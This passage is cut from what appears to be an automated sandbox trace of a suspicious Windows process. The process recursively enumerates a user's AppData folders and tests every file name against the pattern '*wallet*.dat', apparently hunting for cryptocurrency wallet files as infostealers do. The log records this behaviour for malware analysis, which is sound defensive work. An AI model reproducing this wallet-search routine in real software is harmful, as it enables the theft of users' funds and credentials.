nFileSizeHigh=0x41f76, nFileSizeLow=0x141f, dwReserved0=0x207d0, dwReserved1=0x4d0054, cFileName="0", cAlternateFileName="TM5448~1Ð\x07\x02")) returned 0xffffffff [0175.601] FindNextFileA (in: hFindFile=0x4ea590, lpFindFileData=0x195d5c | out: lpFindFileData=0x195d5c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x977efc44, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x977efc44, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x977f0f37, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x35031, dwReserved0=0x141f, dwReserved1=0x207d0, cFileName="TM02851224[[fn=iso690nmerical]].xsl", cAlternateFileName="TM9858~1.XSL")) returned 1 [0175.601] PathMatchSpecA (pszFile="TM02851224[[fn=iso690nmerical]].xsl", pszSpec="*wallet*.dat") returned 0 [0175.601] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Word Document Bibliography Styles\\TM02851224[[fn=iso690nmerical]].xsl\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\word document bibliography styles\\tm02851224[[fn=iso690nmerical]].xsl\\*"), lpFindFileData=0x1956d4 | out: lpFindFileData=0x1956d4*(dwFileAttributes=0x977efc44, ftCreationTime.dwLowDateTime=0x1d705ee, ftCreationTime.dwHighDateTime=0x977efc44, ftLastAccessTime.dwLowDateTime=0x1d705ee, ftLastAccessTime.dwHighDateTime=0x977f0f37, ftLastWriteTime.dwLowDateTime=0x1d705ee, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x35031, nFileSizeLow=0x141f, dwReserved0=0x207d0, dwReserved1=0x4d0054, cFileName="0", cAlternateFileName="TM5448~1Ð\x07\x02")) returned 0xffffffff [0175.601] FindNextFileA (in: hFindFile=0x4ea590, lpFindFileData=0x195d5c | out: lpFindFileData=0x195d5c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9786c3ef, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x9786c3ef, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x9786d825, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x3e39b, dwReserved0=0x141f, dwReserved1=0x207d0, cFileName="TM02851225[[fn=mlaseventheditionofficeonline]].xsl", cAlternateFileName="TM49BE~1.XSL")) returned 1 [0175.601] PathMatchSpecA (pszFile="TM02851225[[fn=mlaseventheditionofficeonline]].xsl", pszSpec="*wallet*.dat") returned 0 [0175.601] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Word Document Bibliography Styles\\TM02851225[[fn=mlaseventheditionofficeonline]].xsl\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\word document bibliography styles\\tm02851225[[fn=mlaseventheditionofficeonline]].xsl\\*"), lpFindFileData=0x1956d4 | out: lpFindFileData=0x1956d4*(dwFileAttributes=0x9786c3ef, ftCreationTime.dwLowDateTime=0x1d705ee, ftCreationTime.dwHighDateTime=0x9786c3ef, ftLastAccessTime.dwLowDateTime=0x1d705ee, ftLastAccessTime.dwHighDateTime=0x9786d825, ftLastWriteTime.dwLowDateTime=0x1d705ee, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x3e39b, nFileSizeLow=0x141f, dwReserved0=0x207d0, dwReserved1=0x4d0054, cFileName="0", cAlternateFileName="TM5448~1Ð\x07\x02")) returned 0xffffffff [0175.601] FindNextFileA (in: hFindFile=0x4ea590, lpFindFileData=0x195d5c | out: lpFindFileData=0x195d5c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x977a2c28, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x977a2c28, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x977a3fe6, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x540ef, dwReserved0=0x141f, dwReserved1=0x207d0, cFileName="TM02851226[[fn=turabian]].xsl", cAlternateFileName="TME914~1.XSL")) returned 1 [0175.601] PathMatchSpecA (pszFile="TM02851226[[fn=turabian]].xsl", pszSpec="*wallet*.dat") returned 0 [0175.601] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Word Document Bibliography Styles\\TM02851226[[fn=turabian]].xsl\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\word document bibliography styles\\tm02851226[[fn=turabian]].xsl\\*"), lpFindFileData=0x1956d4 | out: lpFindFileData=0x1956d4*(dwFileAttributes=0x977a2c28, ftCreationTime.dwLowDateTime=0x1d705ee, ftCreationTime.dwHighDateTime=0x977a2c28, ftLastAccessTime.dwLowDateTime=0x1d705ee, ftLastAccessTime.dwHighDateTime=0x977a3fe6, ftLastWriteTime.dwLowDateTime=0x1d705ee, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x540ef, nFileSizeLow=0x141f, dwReserved0=0x207d0, dwReserved1=0x4d0054, cFileName="0", cAlternateFileName="TM5448~1Ð\x07\x02")) returned 0xffffffff [0175.601] FindNextFileA (in: hFindFile=0x4ea590, lpFindFileData=0x195d5c | out: lpFindFileData=0x195d5c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9830edbc, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x9830edbc, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x98311346, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x3d467, dwReserved0=0x141f, dwReserved1=0x207d0, cFileName="TM02851227[[fn=sist02]].xsl", cAlternateFileName="TMC2F6~1.XSL")) returned 1 [0175.601] PathMatchSpecA (pszFile="TM02851227[[fn=sist02]].xsl", pszSpec="*wallet*.dat") returned 0 [0175.602] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Word Document Bibliography Styles\\TM02851227[[fn=sist02]].xsl\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\word document bibliography styles\\tm02851227[[fn=sist02]].xsl\\*"), lpFindFileData=0x1956d4 | out: lpFindFileData=0x1956d4*(dwFileAttributes=0x9830edbc, ftCreationTime.dwLowDateTime=0x1d705ee, ftCreationTime.dwHighDateTime=0x9830edbc, ftLastAccessTime.dwLowDateTime=0x1d705ee, ftLastAccessTime.dwHighDateTime=0x98311346, ftLastWriteTime.dwLowDateTime=0x1d705ee, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x3d467, nFileSizeLow=0x141f, dwReserved0=0x207d0, dwReserved1=0x4d0054, cFileName="0", cAlternateFileName="TM5448~1Ð\x07\x02")) returned 0xffffffff [0175.602] FindNextFileA (in: hFindFile=0x4ea590, lpFindFileData=0x195d5c | out: lpFindFileData=0x195d5c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9830edbc, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x9830edbc, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x98311346, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x3d467, dwReserved0=0x141f, dwReserved1=0x207d0, cFileName="TM02851227[[fn=sist02]].xsl", cAlternateFileName="TMC2F6~1.XSL")) returned 0 [0175.602] FindClose (in: hFindFile=0x4ea590 | out: hFindFile=0x4ea590) returned 1 [0175.603] FindNextFileA (in: hFindFile=0x4ead50, lpFindFileData=0x1963e4 | out: lpFindFileData=0x1963e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96d61fa7, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x96d61fa7, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x96d61fa7, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3d467, dwReserved1=0x141f, cFileName="Word Document Building Blocks", cAlternateFileName="WORDDO~1")) returned 1 [0175.603] PathMatchSpecA (pszFile="Word Document Building Blocks", pszSpec="*wallet*.dat") returned 0 [0175.603] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Word Document Building Blocks\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\word document building blocks\\*"), lpFindFileData=0x195d5c | out: lpFindFileData=0x195d5c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96d61fa7, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x96d61fa7, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x96d61fa7, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x141f, dwReserved1=0x207d0, cFileName=".", cAlternateFileName="")) returned 0x4ea6d0 [0175.603] FindNextFileA (in: hFindFile=0x4ea6d0, lpFindFileData=0x195d5c | out: lpFindFileData=0x195d5c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96d61fa7, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x96d61fa7, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x96d61fa7, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x141f, dwReserved1=0x207d0, cFileName="..", cAlternateFileName="")) returned 1 [0175.603] FindNextFileA (in: hFindFile=0x4ea6d0, lpFindFileData=0x195d5c | out: lpFindFileData=0x195d5c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96d61fa7, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x985f9d53, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x985f9d53, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x141f, dwReserved1=0x207d0, cFileName="1033", cAlternateFileName="")) returned 1 [0175.603] PathMatchSpecA (pszFile="1033", pszSpec="*wallet*.dat") returned 0 [0175.604] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Word Document Building Blocks\\1033\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\word document building blocks\\1033\\*"), lpFindFileData=0x1956d4 | out: lpFindFileData=0x1956d4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96d61fa7, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x985f9d53, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x985f9d53, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1953d0, dwReserved1=0x1, cFileName=".", cAlternateFileName="")) returned 0x4ea710 [0175.607] FindNextFileA (in: hFindFile=0x4ea710, lpFindFileData=0x1956d4 | out: lpFindFileData=0x1956d4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96d61fa7, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x985f9d53, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x985f9d53, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1953d0, dwReserved1=0x1, cFileName="..", cAlternateFileName="")) returned 1 [0175.607] FindNextFileA (in: hFindFile=0x4ea710, lpFindFileData=0x1956d4 | out: lpFindFileData=0x1956d4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x980dfb29, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x980dfb29, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x980e0ec2, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0xca72, dwReserved0=0x1953d0, dwReserved1=0x1, cFileName="TM01840907[[fn=Equations]].dotx", cAlternateFileName="TM0184~1.DOT")) returned 1 [0175.607] PathMatchSpecA (pszFile="TM01840907[[fn=Equations]].dotx", pszSpec="*wallet*.dat") returned 0 [0175.607] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Word Document Building Blocks\\1033\\TM01840907[[fn=Equations]].dotx\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\word document building blocks\\1033\\tm01840907[[fn=equations]].dotx\\*"), lpFindFileData=0x19504c | out: lpFindFileData=0x19504c*(dwFileAttributes=0x980dfb29, ftCreationTime.dwLowDateTime=0x1d705ee, ftCreationTime.dwHighDateTime=0x980dfb29, ftLastAccessTime.dwLowDateTime=0x1d705ee, ftLastAccessTime.dwHighDateTime=0x980e0ec2, ftLastWriteTime.dwLowDateTime=0x1d705ee, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0xca72, nFileSizeLow=0x1953d0, dwReserved0=0x1, dwReserved1=0x4d0054, cFileName="0", cAlternateFileName="C")) returned 0xffffffff [0175.608] FindNextFileA (in: hFindFile=0x4ea710, lpFindFileData=0x1956d4 | out: lpFindFileData=0x1956d4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x980cc2bb, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x980cc2bb, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x980cc2bb, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0xb8c0, dwReserved0=0x1953d0, dwReserved1=0x1, cFileName="TM02835233[[fn=Text Sidebar (Annual Report Red and Black design)]].docx", cAlternateFileName="TM0283~1.DOC")) returned 1 [0175.608] PathMatchSpecA (pszFile="TM02835233[[fn=Text Sidebar (Annual Report Red and Black design)]].docx", pszSpec="*wallet*.dat") returned 0 [0175.608] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Word Document Building Blocks\\1033\\TM02835233[[fn=Text Sidebar (Annual Report Red and Black design)]].docx\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\word document building blocks\\1033\\tm02835233[[fn=text sidebar (annual report red and black design)]].docx\\*"), lpFindFileData=0x19504c | out: lpFindFileData=0x19504c*(dwFileAttributes=0x980cc2bb, ftCreationTime.dwLowDateTime=0x1d705ee, ftCreationTime.dwHighDateTime=0x980cc2bb, ftLastAccessTime.dwLowDateTime=0x1d705ee, ftLastAccessTime.dwHighDateTime=0x980cc2bb, ftLastWriteTime.dwLowDateTime=0x1d705ee, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0xb8c0, nFileSizeLow=0x1953d0, dwReserved0=0x1, dwReserved1=0x4d0054, cFileName="0", cAlternateFileName="C")) returned 0xffffffff [0175.608] FindNextFileA (in: hFindFile=0x4ea710, lpFindFileData=0x1956d4 | out: lpFindFileData=0x1956d4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98167377, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x98167377, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x98167377, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x866f, dwReserved0=0x1953d0, dwReserved1=0x1, cFileName="TM03998158[[fn=Element]].dotx", cAlternateFileName="TM0399~1.DOT")) returned 1 [0175.608] PathMatchSpecA (pszFile="TM03998158[[fn=Element]].dotx", pszSpec="*wallet*.dat") returned 0 [0175.608] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Word Document Building Blocks\\1033\\TM03998158[[fn=Element]].dotx\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\word document building blocks\\1033\\tm03998158[[fn=element]].dotx\\*"), lpFindFileData=0x19504c | out: lpFindFileData=0x19504c*(dwFileAttributes=0x98167377, ftCreationTime.dwLowDateTime=0x1d705ee, ftCreationTime.dwHighDateTime=0x98167377, ftLastAccessTime.dwLowDateTime=0x1d705ee, ftLastAccessTime.dwHighDateTime=0x98167377, ftLastWriteTime.dwLowDateTime=0x1d705ee, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x866f, nFileSizeLow=0x1953d0, dwReserved0=0x1, dwReserved1=0x4d0054, cFileName="0", cAlternateFileName="C")) returned 0xffffffff [0175.608] FindNextFileA (in: hFindFile=0x4ea710, lpFindFileData=0x1956d4 | out: lpFindFileData=0x1956d4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9846e6c1, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x9846e6c1, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x985f3b86, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x34df74, dwReserved0=0x1953d0, dwReserved1=0x1, cFileName="TM03998159[[fn=Insight]].dotx", cAlternateFileName="TM0399~2.DOT")) returned 1 [0175.608] PathMatchSpecA (pszFile="TM03998159[[fn=Insight]].dotx", pszSpec="*wallet*.dat") returned 0 [0175.608] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Word Document Building Blocks\\1033\\TM03998159[[fn=Insight]].dotx\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\word document building blocks\\1033\\tm03998159[[fn=insight]].dotx\\*"), lpFindFileData=0x19504c | out: lpFindFileData=0x19504c*(dwFileAttributes=0x9846e6c1, ftCreationTime.dwLowDateTime=0x1d705ee, ftCreationTime.dwHighDateTime=0x9846e6c1, ftLastAccessTime.dwLowDateTime=0x1d705ee, ftLastAccessTime.dwHighDateTime=0x985f3b86, ftLastWriteTime.dwLowDateTime=0x1d705ee, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x34df74, nFileSizeLow=0x1953d0, dwReserved0=0x1, dwReserved1=0x4d0054, cFileName="0", cAlternateFileName="C")) returned 0xffffffff [0175.608] FindNextFileA (in: hFindFile=0x4ea710, lpFindFileData=0x1956d4 | out: lpFindFileData=0x1956d4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9846e6c1, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x9846e6c1, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x985f3b86, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x34df74, dwReserved0=0x1953d0, dwReserved1=0x1, cFileName="TM03998159[[fn=Insight]].dotx", cAlternateFileName="TM0399~2.DOT")) returned 0 [0175.608] FindClose (in: hFindFile=0x4ea710 | out: hFindFile=0x4ea710) returned 1 [0175.609] FindNextFileA (in: hFindFile=0x4ea6d0, lpFindFileData=0x195d5c | out: lpFindFileData=0x195d5c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96d61fa7, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x985f9d53, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x985f9d53, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x141f, dwReserved1=0x207d0, cFileName="1033", cAlternateFileName="")) returned 0 [0175.609] FindClose (in: hFindFile=0x4ea6d0 | out: hFindFile=0x4ea6d0) returned 1 [0175.609] FindNextFileA (in: hFindFile=0x4ead50, lpFindFileData=0x1963e4 | out: lpFindFileData=0x1963e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96d61fa7, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x96d61fa7, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x96d61fa7, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3d467, dwReserved1=0x141f, cFileName="Word Document Building Blocks", cAlternateFileName="WORDDO~1")) returned 0 [0175.609] FindClose (in: hFindFile=0x4ead50 | out: hFindFile=0x4ead50) returned 1 [0175.609] FindNextFileA (in: hFindFile=0x4ead10, lpFindFileData=0x196a6c | out: lpFindFileData=0x196a6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96dfa773, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x96e30af9, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x96e30af9, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x3d467, cFileName="User", cAlternateFileName="")) returned 1 [0175.610] PathMatchSpecA (pszFile="User", pszSpec="*wallet*.dat") returned 0 [0175.610] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\user\\*"), lpFindFileData=0x1963e4 | out: lpFindFileData=0x1963e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96dfa773, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x96e30af9, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x96ec9752, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x141f, cFileName=".", cAlternateFileName="")) returned 0x4eacd0 [0175.611] FindNextFileA (in: hFindFile=0x4eacd0, lpFindFileData=0x1963e4 | out: lpFindFileData=0x1963e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96dfa773, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x96e30af9, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x96ec9752, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x141f, cFileName="..", cAlternateFileName="")) returned 1 [0175.611] FindNextFileA (in: hFindFile=0x4eacd0, lpFindFileData=0x1963e4 | out: lpFindFileData=0x1963e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96e30af9, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x96e30af9, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x96e30af9, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x141f, cFileName="Document Themes", cAlternateFileName="DOCUME~1")) returned 1 [0175.611] PathMatchSpecA (pszFile="Document Themes", pszSpec="*wallet*.dat") returned 0 [0175.611] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\user\\document themes\\*"), lpFindFileData=0x195d5c | out: lpFindFileData=0x195d5c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96e30af9, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x96e30af9, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x96e30af9, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x195a58, dwReserved1=0x1, cFileName=".", cAlternateFileName="")) returned 0x4eaa50 [0175.612] FindNextFileA (in: hFindFile=0x4eaa50, lpFindFileData=0x195d5c | out: lpFindFileData=0x195d5c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96e30af9, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x96e30af9, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x96e30af9, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x195a58, dwReserved1=0x1, cFileName="..", cAlternateFileName="")) returned 1 [0175.612] PathMatchSpecA (pszFile="1033", pszSpec="*wallet*.dat") returned 0 [0175.614] PathMatchSpecA (pszFile="SmartArt Graphics", pszSpec="*wallet*.dat") returned 0 [0175.614] PathMatchSpecA (pszFile="1033", pszSpec="*wallet*.dat") returned 0 [0175.615] PathMatchSpecA (pszFile="Word Document Bibliography Styles", pszSpec="*wallet*.dat") returned 0 [0175.615] PathMatchSpecA (pszFile="Word Document Building Blocks", pszSpec="*wallet*.dat") returned 0 [0175.615] PathMatchSpecA (pszFile="1033", pszSpec="*wallet*.dat") returned 0 [0175.651] PathMatchSpecA (pszFile="Normal.dotm", pszSpec="*wallet*.dat") returned 0 [0175.652] PathMatchSpecA (pszFile="Vault", pszSpec="*wallet*.dat") returned 0 [0175.652] PathMatchSpecA (pszFile="Windows", pszSpec="*wallet*.dat") returned 0 [0175.652] PathMatchSpecA (pszFile="AccountPictures", pszSpec="*wallet*.dat") returned 0 [0175.652] PathMatchSpecA (pszFile="desktop.ini", pszSpec="*wallet*.dat") returned 0 [0175.652] PathMatchSpecA (pszFile="Libraries", pszSpec="*wallet*.dat") returned 0 [0175.654] PathMatchSpecA (pszFile="CameraRoll.library-ms", pszSpec="*wallet*.dat") returned 0 [0175.654] PathMatchSpecA (pszFile="desktop.ini", pszSpec="*wallet*.dat") returned 0 [0175.655] PathMatchSpecA (pszFile="Documents.library-ms", pszSpec="*wallet*.dat") returned 0 [0175.655] PathMatchSpecA (pszFile="Music.library-ms", pszSpec="*wallet*.dat") returned 0 [0175.655] PathMatchSpecA (pszFile="Pictures.library-ms", pszSpec="*wallet*.dat") returned 0 [0175.655] PathMatchSpecA (pszFile="SavedPictures.library-ms", pszSpec="*wallet*.dat") returned 0 [0175.655] PathMatchSpecA (pszFile="Videos.library-ms", pszSpec="*wallet*.dat") returned 0 [0175.656] PathMatchSpecA (pszFile="Network Shortcuts", pszSpec="*wallet*.dat") returned 0 [0175.656] PathMatchSpecA (pszFile="Printer Shortcuts", pszSpec="*wallet*.dat") returned 0 [0175.656] PathMatchSpecA (pszFile="Recent", pszSpec="*wallet*.dat") returned 0 [0175.656] PathMatchSpecA (pszFile="-CVq.lnk", pszSpec="*wallet*.dat") returned 0 [0175.656] PathMatchSpecA (pszFile="-dp2.lnk", pszSpec="*wallet*.dat") returned 0 [0175.657] PathMatchSpecA (pszFile="-T2tNcsqpjN.lnk", pszSpec="*wallet*.dat") returned 0 [0175.657] PathMatchSpecA (pszFile="0EKjPh.lnk", pszSpec="*wallet*.dat") returned 0 [0175.657] PathMatchSpecA (pszFile="1ehVX1d0g.lnk", pszSpec="*wallet*.dat") returned 0 [0175.657] PathMatchSpecA (pszFile="1Gg1 lLYVWzjSzBeHI.lnk", pszSpec="*wallet*.dat") returned 0 [0175.657] PathMatchSpecA (pszFile="2hEnWpwjT.lnk", pszSpec="*wallet*.dat") returned 0 [0175.657] PathMatchSpecA (pszFile="2hjE6BWbtbhZAesaR.lnk", pszSpec="*wallet*.dat") returned 0 [0175.657] PathMatchSpecA (pszFile="2i1SY_yO7R6x2.lnk", 